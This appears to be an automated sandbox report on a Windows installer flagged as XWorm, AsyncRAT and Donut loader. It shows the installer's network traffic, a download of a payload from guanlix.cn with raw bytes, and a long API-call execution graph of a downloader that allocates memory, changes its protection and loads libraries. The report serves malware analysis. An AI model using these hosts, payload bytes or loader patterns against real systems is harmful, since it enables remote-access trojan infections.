              Jul 2, 2024 19:24:52.083112955 CEST70004970159.56.110.103192.168.2.7
              Jul 2, 2024 19:24:52.124396086 CEST497017000192.168.2.759.56.110.103
              Jul 2, 2024 19:24:52.342902899 CEST497017000192.168.2.759.56.110.103
              Jul 2, 2024 19:24:52.457667112 CEST70004970159.56.110.103192.168.2.7
              Jul 2, 2024 19:24:52.457775116 CEST70004970159.56.110.103192.168.2.7
              Jul 2, 2024 19:24:52.457781076 CEST70004970159.56.110.103192.168.2.7
              Jul 2, 2024 19:24:52.457860947 CEST497017000192.168.2.759.56.110.103
              Jul 2, 2024 19:24:52.459369898 CEST497017000192.168.2.759.56.110.103
              Jul 2, 2024 19:24:52.462790966 CEST70004970159.56.110.103192.168.2.7
              Jul 2, 2024 19:24:52.465485096 CEST70004970159.56.110.103192.168.2.7
              Jul 2, 2024 19:24:53.029284954 CEST70004970159.56.110.103192.168.2.7
              Jul 2, 2024 19:24:53.031183004 CEST497017000192.168.2.759.56.110.103
              Jul 2, 2024 19:24:53.036181927 CEST70004970159.56.110.103192.168.2.7
              Jul 2, 2024 19:24:53.077976942 CEST497017000192.168.2.759.56.110.103
              Jul 2, 2024 19:24:53.084229946 CEST70004970159.56.110.103192.168.2.7
              Jul 2, 2024 19:24:53.120083094 CEST70004970159.56.110.103192.168.2.7
              Jul 2, 2024 19:24:53.123332977 CEST497017000192.168.2.759.56.110.103
              Jul 2, 2024 19:24:53.170042992 CEST70004970159.56.110.103192.168.2.7
              Jul 2, 2024 19:24:53.662409067 CEST70004970159.56.110.103192.168.2.7
              Jul 2, 2024 19:24:53.664506912 CEST497017000192.168.2.759.56.110.103
              Jul 2, 2024 19:24:53.669692993 CEST70004970159.56.110.103192.168.2.7
              Jul 2, 2024 19:24:58.671253920 CEST497017000192.168.2.759.56.110.103
              Jul 2, 2024 19:24:58.676076889 CEST70004970159.56.110.103192.168.2.7
              Jul 2, 2024 19:24:59.001698017 CEST70004970159.56.110.103192.168.2.7
              Jul 2, 2024 19:24:59.006995916 CEST497017000192.168.2.759.56.110.103
              Jul 2, 2024 19:24:59.014929056 CEST70004970159.56.110.103192.168.2.7
              Jul 2, 2024 19:25:10.530611992 CEST497017000192.168.2.759.56.110.103
              Jul 2, 2024 19:25:10.535440922 CEST70004970159.56.110.103192.168.2.7
              Jul 2, 2024 19:25:10.860430002 CEST70004970159.56.110.103192.168.2.7
              Jul 2, 2024 19:25:10.861341953 CEST497017000192.168.2.759.56.110.103
              Jul 2, 2024 19:25:10.866197109 CEST70004970159.56.110.103192.168.2.7
              TimestampSource PortDest PortSource IPDest IP
              Jul 2, 2024 19:21:06.538072109 CEST6201353192.168.2.71.1.1.1
              Jul 2, 2024 19:21:07.085867882 CEST53620131.1.1.1192.168.2.7
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Jul 2, 2024 19:21:06.538072109 CEST192.168.2.71.1.1.10x3dc9Standard query (0)guanlix.cnA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Jul 2, 2024 19:21:07.085867882 CEST1.1.1.1192.168.2.70x3dc9No error (0)guanlix.cn91.208.240.157A (IP address)IN (0x0001)false
              • guanlix.cn:881
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.74970091.208.240.1578815508C:\Users\user\Desktop\103-o_Installer.exe
              TimestampBytes transferredDirectionData
              Jul 2, 2024 19:21:07.130027056 CEST94OUTGET /103.ccp HTTP/1.1
              User-Agent: Download
              Host: guanlix.cn:881
              Cache-Control: no-cache
              Jul 2, 2024 19:21:08.047209024 CEST1236INHTTP/1.1 200 OK
              Server: nginx/1.26.1
              Date: Tue, 02 Jul 2024 17:20:51 GMT
              Content-Type: application/octet-stream
              Content-Length: 71938
              Last-Modified: Thu, 13 Jun 2024 01:27:05 GMT
              Connection: keep-alive
              ETag: "666a4ae9-11902"
              Accept-Ranges: bytes
              Data Raw: e8 88 bb 00 00 88 bb 00 00 fb 5d ff e0 ef bf b0 5f 31 b0 bd 8e 81 b3 52 e4 ec 19 18 69 e6 c6 e6 a5 b3 08 46 07 63 45 5b 43 00 00 00 00 59 79 03 8d 8b d8 c6 a7 da 49 b9 0e e8 ce 1a 60 47 d1 60 39 01 b8 41 a0 c0 c2 9d f2 92 9b 3c 89 1f b7 87 78 70 51 26 50 26 83 e6 17 35 09 23 81 06 b9 48 cd 72 66 0d 87 b6 77 0b 0f c2 35 2d 7a 93 7b 5c b8 88 68 74 84 a8 6f 3e 2f 02 82 5e 05 8e 18 33 c3 21 b5 0d 05 21 4d e1 fc d9 d8 fd 89 73 41 1c 94 91 41 ca 77 f0 2d 2b e3 b8 92 0f b3 50 b3 75 35 db 9c e5 c4 a6 ab 7e 6b bb 49 eb 77 17 bb b6 25 e5 f6 41 09 9c 00 0d 50 e8 31 50 38 7e a6 e4 63 e3 1e a1 e1 e7 9f 2a 34 ef 53 d3 36 74 85 bf 46 6c 73 bc 95 6a 26 54 a6 3b 76 73 8c 44 e9 ce 2e 87 19 62 a0 86 44 e3 ee 0d 30 79 1f 37 29 a3 4a f8 46 97 37 33 82 b3 ba 7e b8 60 8c d2 8f 4c d3 6a d9 3d e9 2c 45 01 a1 9a 4b 74 66 f6 bc ef e6 7c 41 4e 94 1f 04 a7 0f ef fb 89 e3 d8 d8 d2 9f a1 6a 54 73 48 27 b4 89 0d 91 3b d9 b6 a0 9e 5c 36 98 41 d7 65 ac 16 0d a3 24 3d 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
              Data Ascii: ]_1RiFcE[CYyI`G`9A<xpQ&P&5#Hrfw5-z{\hto>/^3!!MsAAw-+Pu5~kIw%AP1P8~c*4S6tFlsj&T;vsD.bD0y7)JF73~`Lj=,EKtf|ANjTsH';\6Ae$=($=V3O ,bfBC=]\HC{}Z(Y'+2jwOa&^^{Rj|"/*}"=jVP)C8h`mlTK#vZl:]}j]]}FuSOSu1R @Rq)6HHX}TOkB$MGqHI(1SG`!t<[AzA?5ufcj6<;;Q^l3.5Nh;XeA~WJnE JU[ldIb[=0f>_mc


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Target ID:0
              Start time:13:21:05
              Start date:02/07/2024
              Path:C:\Users\user\Desktop\103-o_Installer.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\103-o_Installer.exe"
              Imagebase:0x3a0000
              File size:249'344 bytes
              MD5 hash:DC4B9BE7A5645D5C7FD18A4AC175830C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.3671240808.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3672250082.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3672250082.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3671692196.0000000003141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low
              Has exited:false

              Reset < >

                Execution Graph

                Execution Coverage:11.3%
                Dynamic/Decrypted Code Coverage:4.7%
                Signature Coverage:2.1%
                Total number of Nodes:746
                Total number of Limit Nodes:64
                execution_graph 25716 3a3aa9 25718 3a3ac8 25716->25718 25717 3a3b0e 25724 3a3b15 25717->25724 25726 3a3a8a 25717->25726 25718->25717 25721 3a3a8a std::_Xfsopen 143 API calls 25718->25721 25722 3a3af4 25718->25722 25721->25717 25724->25722 25729 3a5902 25724->25729 25743 3a747d 25726->25743 25728 3a3aa4 25728->25722 25742 3a75c3 101 API calls 4 library calls 25728->25742 25730 3a590e __fsopen 25729->25730 25731 3a5920 25730->25731 25733 3a5935 25730->25733 26045 3aa95f 66 API calls __getptd_noexit 25731->26045 25735 3a50e4 __lock_file 67 API calls 25733->25735 25740 3a5930 __fsopen 25733->25740 25734 3a5925 26046 3aa90d 11 API calls __fsopen 25734->26046 25736 3a594e 25735->25736 26029 3a5895 25736->26029 25740->25722 25742->25724 25746 3a7489 __fsopen 25743->25746 25744 3a749c 25801 3aa95f 66 API calls __getptd_noexit 25744->25801 25746->25744 25748 3a74c9 25746->25748 25747 3a74a1 25802 3aa90d 11 API calls __fsopen 25747->25802 25762 3b14e3 25748->25762 25751 3a74ce 25752 3a74e2 25751->25752 25753 3a74d5 25751->25753 25755 3a7509 25752->25755 25756 3a74e9 25752->25756 25803 3aa95f 66 API calls __getptd_noexit 25753->25803 25779 3b124c 25755->25779 25804 3aa95f 66 API calls __getptd_noexit 25756->25804 25758 3a74ac __fsopen @_EH4_CallFilterFunc@8 25758->25728 25763 3b14ef __fsopen 25762->25763 25764 3ab7b7 __lock 66 API calls 25763->25764 25771 3b14fd 25764->25771 25765 3b1579 25766 3a63b8 __malloc_crt 66 API calls 25765->25766 25768 3b1580 25766->25768 25770 3b158e InitializeCriticalSectionAndSpinCount 25768->25770 25777 3b1572 25768->25777 25769 3b1602 __fsopen 25769->25751 25772 3b15ae 25770->25772 25773 3b15c1 EnterCriticalSection 25770->25773 25771->25765 25774 3ab6f5 __mtinitlocknum 66 API calls 25771->25774 25771->25777 25809 3a5125 67 API calls __lock 25771->25809 25810 3a5193 LeaveCriticalSection LeaveCriticalSection _doexit 25771->25810 25811 3a4452 66 API calls 2 library calls 25772->25811 25773->25777 25774->25771 25806 3b160d 25777->25806 25780 3b126e 25779->25780 25781 3b1282 25780->25781 25793 3b1299 25780->25793 25816 3aa95f 66 API calls __getptd_noexit 25781->25816 25783 3b1436 25786 3b148a 25783->25786 25787 3b149c 25783->25787 25784 3b1287 25817 3aa90d 11 API calls __fsopen 25784->25817 25822 3aa95f 66 API calls __getptd_noexit 25786->25822 25813 3b5135 25787->25813 25790 3b148f 25823 3aa90d 11 API calls __fsopen 25790->25823 25791 3a7514 25805 3a752f LeaveCriticalSection LeaveCriticalSection _fputc 25791->25805 25793->25783 25793->25786 25818 3b54bf 76 API calls __fassign 25793->25818 25795 3b1405 25795->25786 25819 3b5359 85 API calls __mbsnbicmp_l 25795->25819 25797 3b142f 25797->25783 25820 3b5359 85 API calls __mbsnbicmp_l 25797->25820 25799 3b144e 25799->25783 25821 3b5359 85 API calls __mbsnbicmp_l 25799->25821 25801->25747 25802->25758 25803->25758 25804->25758 25805->25758 25812 3ab6de LeaveCriticalSection 25806->25812 25808 3b1614 25808->25769 25809->25771 25810->25771 25811->25777 25812->25808 25824 3b5071 25813->25824 25815 3b5150 25815->25791 25816->25784 25817->25791 25818->25795 25819->25797 25820->25799 25821->25783 25822->25790 25823->25791 25827 3b507d __fsopen 25824->25827 25825 3b5090 25943 3aa95f 66 API calls __getptd_noexit 25825->25943 25827->25825 25829 3b50c6 25827->25829 25828 3b5095 25944 3aa90d 11 API calls __fsopen 25828->25944 25835 3b493d 25829->25835 25832 3b50e0 25945 3b5107 LeaveCriticalSection __unlock_fhandle 25832->25945 25834 3b509f __fsopen 25834->25815 25836 3b4964 25835->25836 25946 3b7f22 25836->25946 25838 3b4bef 25972 3aa8bb 25838->25972 25840 3b49bf 25975 3aa972 66 API calls __getptd_noexit 25840->25975 25842 3b5070 __fsopen 25845 3b5090 25842->25845 25851 3b50c6 25842->25851 25843 3b4980 25843->25838 25843->25840 25846 3b4a1a 25843->25846 25844 3b49c4 25976 3aa95f 66 API calls __getptd_noexit 25844->25976 26006 3aa95f 66 API calls __getptd_noexit 25845->26006 25852 3b4aa1 25846->25852 25862 3b4a74 25846->25862 25849 3b49ce 25977 3aa90d 11 API calls __fsopen 25849->25977 25850 3b5095 26007 3aa90d 11 API calls __fsopen 25850->26007 25855 3b493d __tsopen_nolock 120 API calls 25851->25855 25978 3aa972 66 API calls __getptd_noexit 25852->25978 25857 3b50e0 25855->25857 26008 3b5107 LeaveCriticalSection __unlock_fhandle 25857->26008 25858 3b4aa6 25979 3aa95f 66 API calls __getptd_noexit 25858->25979 25861 3b509f __fsopen 25861->25832 25953 3b3f4b 25862->25953 25863 3b4ab0 25980 3aa90d 11 API calls __fsopen 25863->25980 25866 3b49d8 25866->25832 25867 3b4b32 25868 3b4b3b 25867->25868 25869 3b4b5c CreateFileA 25867->25869 25981 3aa972 66 API calls __getptd_noexit 25868->25981 25870 3b4bf9 GetFileType 25869->25870 25871 3b4b89 25869->25871 25874 3b4c4a 25870->25874 25875 3b4c06 GetLastError 25870->25875 25873 3b4bc2 GetLastError 25871->25873 25879 3b4b9d CreateFileA 25871->25879 25984 3aa985 66 API calls 3 library calls 25873->25984 25988 3b3d15 67 API calls 2 library calls 25874->25988 25986 3aa985 66 API calls 3 library calls 25875->25986 25876 3b4b40 25982 3aa95f 66 API calls __getptd_noexit 25876->25982 25879->25870 25879->25873 25881 3b4c2f CloseHandle 25883 3b4be9 25881->25883 25884 3b4c3d 25881->25884 25882 3b4b4a 25983 3aa95f 66 API calls __getptd_noexit 25882->25983 25985 3aa95f 66 API calls __getptd_noexit 25883->25985 25987 3aa95f 66 API calls __getptd_noexit 25884->25987 25888 3b4c68 25891 3b4cbe 25888->25891 25892 3b4d2d 25888->25892 25893 3b4f5c 25888->25893 25890 3b4c42 25890->25883 25989 3b1772 68 API calls 3 library calls 25891->25989 25892->25893 25907 3b4dd7 25892->25907 25909 3b4e87 25892->25909 25893->25838 25896 3b4fe6 CloseHandle CreateFileA 25893->25896 25895 3b4cc8 25898 3b4cea 25895->25898 25899 3b4cd1 25895->25899 25897 3b5013 GetLastError 25896->25897 25942 3b4ef2 25896->25942 26004 3aa985 66 API calls 3 library calls 25897->26004 25992 3b34e7 76 API calls 6 library calls 25898->25992 25990 3aa972 66 API calls __getptd_noexit 25899->25990 25903 3b501f 26005 3b3d96 67 API calls 2 library calls 25903->26005 25907->25893 25916 3b4dfb 25907->25916 25917 3b4e26 25907->25917 25940 3b4e42 25907->25940 25908 3b4cfb 25914 3b4d14 25908->25914 25993 3b7cb1 100 API calls 6 library calls 25908->25993 25909->25893 25913 3b4ea4 25909->25913 25909->25916 25911 3b4cd6 25911->25892 25941 3b4cde 25911->25941 25998 3ac47c 68 API calls 3 library calls 25913->25998 25914->25941 25994 3b1772 68 API calls 3 library calls 25914->25994 25916->25893 25920 3abee7 __write 97 API calls 25916->25920 25916->25941 25995 3ac47c 68 API calls 3 library calls 25917->25995 25918 3b4eaf 25918->25916 25919 3b4eba 25918->25919 25999 3ac47c 68 API calls 3 library calls 25919->25999 25920->25916 25921 3b4eff 25923 3b4f21 25921->25923 25930 3b4f06 25921->25930 25922 3b4ee5 26000 3ac5eb 69 API calls 3 library calls 25922->26000 26003 3b1772 68 API calls 3 library calls 25923->26003 25924 3b4e5c 25924->25921 25924->25922 25924->25923 25929 3b4e7e 25924->25929 25924->25941 25929->25893 26002 3b1772 68 API calls 3 library calls 25930->26002 25931 3b4e31 25931->25916 25932 3b4e38 25931->25932 25996 3ac47c 68 API calls 3 library calls 25932->25996 25933 3b4ec4 25933->25893 25933->25941 25934 3b4eec 26001 3aa95f 66 API calls __getptd_noexit 25934->26001 25939 3b4f10 25939->25929 25939->25941 25940->25941 25997 3b34e7 76 API calls 6 library calls 25940->25997 25991 3ac5eb 69 API calls 3 library calls 25941->25991 25942->25838 25943->25828 25944->25834 25945->25834 25947 3b7f2e 25946->25947 25948 3b7f43 25946->25948 26009 3aa95f 66 API calls __getptd_noexit 25947->26009 25948->25843 25950 3b7f33 26010 3aa90d 11 API calls __fsopen 25950->26010 25952 3b7f3e 25952->25843 25954 3b3f57 __fsopen 25953->25954 25955 3ab6f5 __mtinitlocknum 66 API calls 25954->25955 25956 3b3f67 25955->25956 25957 3ab7b7 __lock 66 API calls 25956->25957 25958 3b3f6c __fsopen 25956->25958 25967 3b3f7b 25957->25967 25958->25867 25959 3b40c6 26013 3b40db LeaveCriticalSection _doexit 25959->26013 25961 3b4053 26012 3a63fd 66 API calls __calloc_crt 25961->26012 25963 3ab7b7 __lock 66 API calls 25963->25967 25964 3b3ffb EnterCriticalSection 25966 3b400b LeaveCriticalSection 25964->25966 25964->25967 25965 3b405c 25965->25959 25969 3b3e85 ___lock_fhandle 68 API calls 25965->25969 25966->25967 25967->25959 25967->25961 25967->25963 25967->25964 25968 3b3fd1 InitializeCriticalSectionAndSpinCount 25967->25968 26011 3b401d LeaveCriticalSection _doexit 25967->26011 25968->25967 25971 3b40bd 25969->25971 25971->25959 26014 3aa792 25972->26014 25975->25844 25976->25849 25977->25866 25978->25858 25979->25863 25980->25866 25981->25876 25982->25882 25983->25866 25984->25883 25985->25838 25986->25881 25987->25890 25988->25888 25989->25895 25990->25911 25991->25890 25992->25908 25993->25914 25994->25911 25995->25931 25996->25940 25997->25924 25998->25918 25999->25933 26000->25934 26001->25942 26002->25939 26003->25933 26004->25903 26005->25942 26006->25850 26007->25861 26008->25861 26009->25950 26010->25952 26011->25967 26012->25965 26013->25958 26015 3aa7b1 _memset __call_reportfault 26014->26015 26016 3aa7cf IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 26015->26016 26019 3aa89d __call_reportfault 26016->26019 26018 3aa8b9 GetCurrentProcess TerminateProcess 26018->25842 26020 3a65d1 26019->26020 26021 3a65db IsDebuggerPresent 26020->26021 26022 3a65d9 26020->26022 26028 3b2685 26021->26028 26022->26018 26025 3ae015 SetUnhandledExceptionFilter UnhandledExceptionFilter 26026 3ae03a GetCurrentProcess TerminateProcess 26025->26026 26027 3ae032 __call_reportfault 26025->26027 26026->26018 26027->26026 26028->26025 26030 3a58ba 26029->26030 26031 3a58a6 26029->26031 26043 3a58b6 26030->26043 26048 3a51c2 26030->26048 26054 3aa95f 66 API calls __getptd_noexit 26031->26054 26033 3a58ab 26055 3aa90d 11 API calls __fsopen 26033->26055 26038 3a58ce 26039 3ab0e3 __ftell_nolock 66 API calls 26038->26039 26040 3a58d4 26039->26040 26057 3ac687 72 API calls 5 library calls 26040->26057 26042 3a58da 26042->26043 26058 3a4452 66 API calls 2 library calls 26042->26058 26047 3a596e LeaveCriticalSection LeaveCriticalSection _fputc 26043->26047 26045->25734 26046->25740 26047->25740 26049 3a51db 26048->26049 26053 3a51fd 26048->26053 26050 3ab0e3 __ftell_nolock 66 API calls 26049->26050 26049->26053 26051 3a51f6 26050->26051 26052 3abee7 __write 97 API calls 26051->26052 26052->26053 26056 3ac094 66 API calls _free 26053->26056 26054->26033 26055->26043 26056->26038 26057->26042 26058->26043 26059 3a2c4c 26060 3a2c5a 26059->26060 26064 3a2c6d Mailbox 26059->26064 26065 3a2875 26060->26065 26062 3a2c5f 26063 3a5902 _Xfiopen 102 API calls 26062->26063 26063->26064 26067 3a287f __EH_prolog 26065->26067 26066 3a28a6 Mailbox 26066->26062 26067->26066 26072 3a252d 77 API calls 2 library calls 26067->26072 26069 3a28c5 26069->26066 26073 3a566a 99 API calls 3 library calls 26069->26073 26074 3a2423 77 API calls 2 library calls 26069->26074 26072->26069 26073->26069 26074->26069 26075 2edfb37 26092 2ee1628 GetPEB 26075->26092 26077 2edfb57 26078 2ee1628 GetPEB 26077->26078 26079 2edfb6b 26078->26079 26080 2edfb84 VirtualAlloc 26079->26080 26083 2edfcc8 26079->26083 26081 2edfb9b 26080->26081 26080->26083 26082 2ee1628 GetPEB 26081->26082 26081->26083 26084 2edfc0d 26082->26084 26084->26083 26085 2edfc2b LoadLibraryA 26084->26085 26088 2edfc3b 26084->26088 26085->26085 26085->26088 26086 2ee1628 GetPEB 26086->26088 26087 2edfc77 26087->26083 26094 2edffe7 LoadLibraryA 26087->26094 26088->26083 26088->26086 26088->26087 26093 2ee163c 26092->26093 26093->26077 26095 2ee0004 26094->26095 26096 2edfcb5 26094->26096 26095->26096 26097 2ee002c VirtualProtect 26095->26097 26096->26083 26104 2ee00cd 26096->26104 26097->26096 26098 2ee0040 26097->26098 26099 2ee005a VirtualProtect 26098->26099 26100 2ee0076 26099->26100 26100->26096 26101 2ee008a VirtualProtect 26100->26101 26101->26096 26102 2ee009a 26101->26102 26103 2ee00af VirtualProtect 26102->26103 26103->26096 26106 2ee00de 26104->26106 26105 2ee00e4 26105->26083 26106->26105 26107 2ee0112 VirtualProtect 26106->26107 26107->26105 26108 2ee0126 26107->26108 26109 2ee0140 VirtualProtect 26108->26109 26110 2ee015c 26109->26110 26110->26105 26111 2ee0170 VirtualProtect 26110->26111 26111->26105 26112 2ee0180 26111->26112 26113 2ee0195 VirtualProtect 26112->26113 26113->26105 25102 3a59d4 25152 3aa9b0 25102->25152 25104 3a59e0 GetStartupInfoW 25105 3a59f4 HeapSetInformation 25104->25105 25106 3a59ff 25104->25106 25105->25106 25153 3aac41 HeapCreate 25106->25153 25108 3a5a4d 25109 3a5a58 25108->25109 25168 3a59ab 66 API calls 3 library calls 25108->25168 25169 3a98e5 86 API calls 4 library calls 25109->25169 25112 3a5a5e 25113 3a5a6a __RTC_Initialize 25112->25113 25114 3a5a62 25112->25114 25154 3aae9e 73 API calls __calloc_crt 25113->25154 25170 3a59ab 66 API calls 3 library calls 25114->25170 25116 3a5a69 25116->25113 25118 3a5a77 25119 3a5a7b 25118->25119 25120 3a5a83 GetCommandLineA 25118->25120 25171 3ab61f 66 API calls 3 library calls 25119->25171 25155 3ace83 71 API calls 2 library calls 25120->25155 25123 3a5a93 25172 3acdc8 95 API calls 3 library calls 25123->25172 25126 3a5a9d 25127 3a5aa9 25126->25127 25128 3a5aa1 25126->25128 25156 3acb52 94 API calls 7 library calls 25127->25156 25173 3ab61f 66 API calls 3 library calls 25128->25173 25132 3a5aae 25133 3a5aba 25132->25133 25134 3a5ab2 25132->25134 25157 3ab3fe 77 API calls 4 library calls 25133->25157 25174 3ab61f 66 API calls 3 library calls 25134->25174 25138 3a5ac1 25139 3a5acd 25138->25139 25140 3a5ac6 25138->25140 25158 3acaf3 94 API calls 2 library calls 25139->25158 25175 3ab61f 66 API calls 3 library calls 25140->25175 25144 3a5ad2 25145 3a5ad8 25144->25145 25159 3a2f3d 25144->25159 25145->25144 25148 3a5afc 25177 3ab601 66 API calls _doexit 25148->25177 25151 3a5b01 __fsopen 25152->25104 25153->25108 25154->25118 25155->25123 25156->25132 25157->25138 25158->25144 25178 3a1186 25159->25178 25168->25109 25169->25112 25170->25116 25172->25126 25176 3ab5d5 66 API calls _doexit 25176->25148 25177->25151 25218 3a41ba GetSystemTimeAsFileTime 25178->25218 25180 3a1193 25220 3a434a 25180->25220 25182 3a1199 25183 3a435c 66 API calls _rand 25182->25183 25184 3a11de VirtualAlloc 25182->25184 25183->25182 25185 3a2e58 25184->25185 25186 3a2e5d __ftelli64_nolock __EH_prolog 25185->25186 25187 3a2e6c InternetOpenA 25186->25187 25188 3a2e8a InternetOpenUrlA 25187->25188 25189 3a2f30 VirtualFree 25187->25189 25190 3a2f27 InternetCloseHandle 25188->25190 25191 3a2ea7 25188->25191 25201 3a168b 25189->25201 25190->25189 25250 3a2d2e 25191->25250 25193 3a2ebb 25194 3a2f0f InternetCloseHandle 25193->25194 25195 3a2eed InternetReadFile 25193->25195 25197 3a2f02 25193->25197 25260 3a25c3 25193->25260 25271 3a2e1c 116 API calls std::ios_base::_Ios_base_dtor 25194->25271 25195->25193 25195->25197 25270 3a2c95 113 API calls Mailbox 25197->25270 25199 3a2f0d 25199->25194 25203 3a1690 25201->25203 25202 3a16f5 25211 3a11e1 GetTickCount64 Sleep GetTickCount64 25202->25211 25203->25202 25205 3a16ad 25203->25205 25686 3a437d 104 API calls 7 library calls 25203->25686 25207 3a16c5 25205->25207 25687 3a437d 104 API calls 7 library calls 25205->25687 25209 3a16dd 25207->25209 25688 3a437d 104 API calls 7 library calls 25207->25688 25209->25202 25689 3a437d 104 API calls 7 library calls 25209->25689 25690 3a4424 25211->25690 25214 3a122d CreateFileA GetFileSize VirtualAlloc ReadFile CloseHandle 25217 3a1283 25214->25217 25215 3a4424 99 API calls 25216 3a122c 25215->25216 25216->25214 25217->25148 25217->25176 25219 3a41ea __aulldiv 25218->25219 25219->25180 25223 3a979c 25220->25223 25228 3a9723 GetLastError 25223->25228 25225 3a97a4 25226 3a4354 25225->25226 25243 3ab61f 66 API calls 3 library calls 25225->25243 25226->25182 25244 3a95fe TlsGetValue 25228->25244 25231 3a9742 25247 3a63fd 66 API calls __calloc_crt 25231->25247 25232 3a9790 SetLastError 25232->25225 25234 3a974e 25234->25232 25235 3a9756 DecodePointer 25234->25235 25236 3a976b 25235->25236 25237 3a976f 25236->25237 25238 3a9787 25236->25238 25248 3a966f 66 API calls 4 library calls 25237->25248 25249 3a4452 66 API calls 2 library calls 25238->25249 25241 3a9777 GetCurrentThreadId 25241->25232 25242 3a978d 25242->25232 25245 3a962e 25244->25245 25246 3a9613 DecodePointer TlsSetValue 25244->25246 25245->25231 25245->25232 25246->25245 25247->25234 25248->25241 25249->25242 25251 3a2d33 __EH_prolog 25250->25251 25272 3a2813 25251->25272 25255 3a2d8b 25279 3a2483 25255->25279 25257 3a2dc4 25257->25193 25261 3a25c8 __EH_prolog 25260->25261 25429 3a221d 25261->25429 25264 3a25f1 25437 3a1c08 67 API calls 25264->25437 25266 3a266e 25438 3a24f0 67 API calls __EH_prolog 25266->25438 25268 3a267a 25268->25195 25270->25199 25271->25190 25273 3a2818 __EH_prolog 25272->25273 25292 3a257a 25273->25292 25276 3a1fa3 25410 3a1ce8 25276->25410 25278 3a1fae 25278->25255 25281 3a2488 __EH_prolog 25279->25281 25280 3a24db 25280->25257 25287 3a153b 25280->25287 25281->25280 25425 3a130b EnterCriticalSection LeaveCriticalSection std::locale::facet::_Incref 25281->25425 25283 3a24c0 25426 3a235f 114 API calls 8 library calls 25283->25426 25285 3a24ca 25286 3a10ee std::ios_base::_Ios_base_dtor 2 API calls 25285->25286 25286->25280 25288 3a15bd 25287->25288 25290 3a1551 25287->25290 25288->25257 25427 3a450c RaiseException 25290->25427 25428 3a3c86 66 API calls std::exception::_Copy_str 25290->25428 25301 3a1606 25292->25301 25297 3a25b1 25299 3a25bd 25297->25299 25316 3a37ca EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit _tidy_global 25297->25316 25298 3a153b 67 API calls 25298->25297 25299->25276 25302 3a153b 67 API calls 25301->25302 25303 3a1639 25302->25303 25317 3a448c 25303->25317 25306 3a164c 25308 3a2318 25306->25308 25309 3a2322 __EH_prolog 25308->25309 25359 3a1167 25309->25359 25316->25299 25321 3a4496 25317->25321 25319 3a1640 25319->25306 25329 3a10d4 82 API calls 3 library calls 25319->25329 25321->25319 25324 3a44b2 std::exception::exception 25321->25324 25330 3a729e 25321->25330 25347 3aac6e DecodePointer 25321->25347 25322 3a44f0 25349 3a3d0b 66 API calls std::exception::operator= 25322->25349 25324->25322 25348 3a65ba 76 API calls __cinit 25324->25348 25325 3a44fa 25350 3a450c RaiseException 25325->25350 25328 3a450b 25329->25306 25331 3a731b 25330->25331 25340 3a72ac 25330->25340 25357 3aac6e DecodePointer 25331->25357 25333 3a7321 25358 3aa95f 66 API calls __getptd_noexit 25333->25358 25336 3a72da RtlAllocateHeap 25337 3a7313 25336->25337 25336->25340 25337->25321 25339 3a72b7 25339->25340 25351 3ac970 66 API calls __NMSG_WRITE 25339->25351 25352 3ac7c1 66 API calls 6 library calls 25339->25352 25353 3ab37d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 25339->25353 25340->25336 25340->25339 25341 3a7307 25340->25341 25345 3a7305 25340->25345 25354 3aac6e DecodePointer 25340->25354 25355 3aa95f 66 API calls __getptd_noexit 25341->25355 25356 3aa95f 66 API calls __getptd_noexit 25345->25356 25347->25321 25348->25322 25349->25325 25350->25328 25351->25339 25352->25339 25354->25340 25355->25345 25356->25337 25357->25333 25358->25337 25384 3a106a 25359->25384 25362 3a1e2e 25363 3a1e38 __EH_prolog 25362->25363 25364 3a314c std::_Lockit::_Lockit EnterCriticalSection 25363->25364 25365 3a1e47 25364->25365 25399 3a1035 25365->25399 25367 3a1e5e 25379 3a1e71 25367->25379 25405 3a1b85 114 API calls 3 library calls 25367->25405 25368 3a3174 _tidy_global LeaveCriticalSection 25370 3a1ec6 25368->25370 25380 3a10ee 25370->25380 25371 3a1e81 25372 3a1ea3 25371->25372 25406 3a3ce2 66 API calls std::exception::exception 25371->25406 25374 3a106a std::locale::facet::_Incref 2 API calls 25372->25374 25376 3a1eb3 25374->25376 25375 3a1e95 25407 3a450c RaiseException 25375->25407 25408 3a31a0 77 API calls std::_Mutex::_Mutex 25376->25408 25379->25368 25381 3a10f4 25380->25381 25382 3a10f9 25380->25382 25409 3a1092 EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit _tidy_global 25381->25409 25382->25297 25382->25298 25389 3a314c 25384->25389 25390 3a315e 25389->25390 25391 3a107b 25389->25391 25397 3a3b81 EnterCriticalSection 25390->25397 25393 3a3174 25391->25393 25394 3a108f 25393->25394 25395 3a317b 25393->25395 25394->25362 25398 3a3b91 LeaveCriticalSection 25395->25398 25397->25391 25398->25394 25400 3a1041 25399->25400 25401 3a1065 25399->25401 25402 3a314c std::_Lockit::_Lockit EnterCriticalSection 25400->25402 25401->25367 25403 3a104b 25402->25403 25404 3a3174 _tidy_global LeaveCriticalSection 25403->25404 25404->25401 25405->25371 25406->25375 25407->25372 25408->25379 25409->25382 25411 3a1cf2 __EH_prolog 25410->25411 25418 3a3a47 25411->25418 25414 3a448c std::_Mutex::_Mutex 77 API calls 25415 3a1d12 25414->25415 25417 3a1d1e 